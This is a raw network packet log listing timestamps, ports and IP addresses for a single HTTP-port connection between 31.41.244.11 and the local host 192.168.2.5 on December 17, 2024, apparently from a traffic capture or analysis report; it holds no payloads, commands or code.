Dec 17, 2024 06:03:21.284374952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.284418106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.284459114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.284547091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.285515070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.285649061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.285681009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.285732985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.286581993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.286850929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.286884069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.286986113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.287751913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.287767887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.287822008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.287822008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.288840055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.288880110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.288913965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.289005995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.289901972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.289961100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.289999962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.290106058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.291070938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.291171074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.291203022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.291255951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.292184114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.292354107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.292387962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.292479038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.293235064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.293297052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.427412033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.427505970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.427517891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.427572012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.427937984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.428010941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.428067923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.428117990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.429073095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.429199934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.429258108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.429363966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.430156946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.430255890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.430255890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.430382013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.431276083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.431365967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.431432009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.431526899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.432374954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.432426929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.432591915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.432673931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.433480024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.433532953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.433593988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.433697939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.434652090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.434750080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.434758902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.434835911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.435794115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.435828924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.435897112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.435897112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.436866999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.436964989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.437025070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.437120914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.437937021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.438011885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.438136101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.438189030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.439028025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.439112902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.439331055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.439476013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.440236092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.440300941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.440319061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.440372944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.441308975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.441402912 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.441462040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.441524029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.442388058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.442464113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.442526102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.442591906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.443670988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.443705082 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.443785906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.443785906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.444644928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.444715023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.444777012 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.444849014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.445763111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.445822954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.445861101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.445930004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.446847916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.446906090 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.446968079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.447079897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.447985888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.448096037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.448158979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.448220015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.449104071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.449160099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.449222088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.449280024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.450184107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.450242043 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.450304985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.450372934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.451406956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.451456070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.451498032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.451591015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.452435017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.452517033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.452542067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.452694893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.453592062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.453767061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.453830004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.453912973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.454638958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.454709053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.454767942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.454832077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.455764055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.455820084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.455883026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.455948114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.456887007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.456973076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.457036018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.457176924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.457998991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.458064079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.458125114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.458199024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.459089994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.459150076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.459187031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.459249020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.460221052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.460290909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.460354090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.460450888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.461405993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.461460114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.461471081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.461559057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.462495089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.462582111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.462656975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.462738991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.463577032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.463664055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.463675022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.463726997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.464694023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.464886904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.464961052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.465012074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.465981007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.466015100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.466243029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.466243029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.466892004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.467343092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.467396975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.467456102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.468053102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.468133926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.468206882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.468260050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.469156981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.469209909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.469346046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.469408035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.470227003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.470280886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.470366001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.470446110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.471373081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.471460104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.471461058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.471534967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.472615004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.472649097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.472739935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.472739935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.473660946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.473742008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.473798037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.473871946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.474677086 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.474818945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.474878073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.474931002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.475855112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.475970984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.476022005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.476022005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.476910114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.476989985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.477051020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.477114916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.478127956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.478252888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.478266954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.478363991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.479207039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.479302883 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.479387045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.479453087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.480298042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.480370045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.480432034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.480498075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.481446981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.481524944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.481585979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.481650114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.482578993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.482640028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.482676029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.482743025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.483665943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.483726978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.483772993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.483772993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.484747887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.484853983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.484916925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.484971046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.485830069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.485953093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.619518995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.619630098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.619767904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.620085955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.620270014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.620393991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.621135950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.621241093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.621398926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.622262001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.622359991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.622417927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.623363018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.623524904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.623644114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.624440908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.624522924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.624536037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.625566959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.625647068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.625709057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.626013994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.626774073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.626808882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.626877069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.628024101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.628057957 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.628228903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.628936052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.629102945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.629148960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.630043030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.630083084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.630214930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.630413055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.631125927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.631359100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.631417036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.632253885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.632371902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.632426977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.633513927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.633548021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.633677959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.633677959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.634515047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.634568930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.634741068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.635596991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.635710955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.635802984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.636728048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.636786938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.636806011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.636991978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.637820959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.637888908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.637923002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.637972116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.639168978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.639184952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.639236927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.640186071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.640199900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.640247107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.641336918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.641352892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.641397953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.641417027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.642406940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.642422915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.642478943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.643388033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.643621922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.643757105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.644706964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.644721985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.644839048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.644839048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.645697117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.645713091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.645756960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.645756960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.646749020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.646773100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.646821976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.647835016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.647958994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.648081064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.649092913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.649108887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.649142027 CET	49850	80	192.168.2.5	31.41.244.11
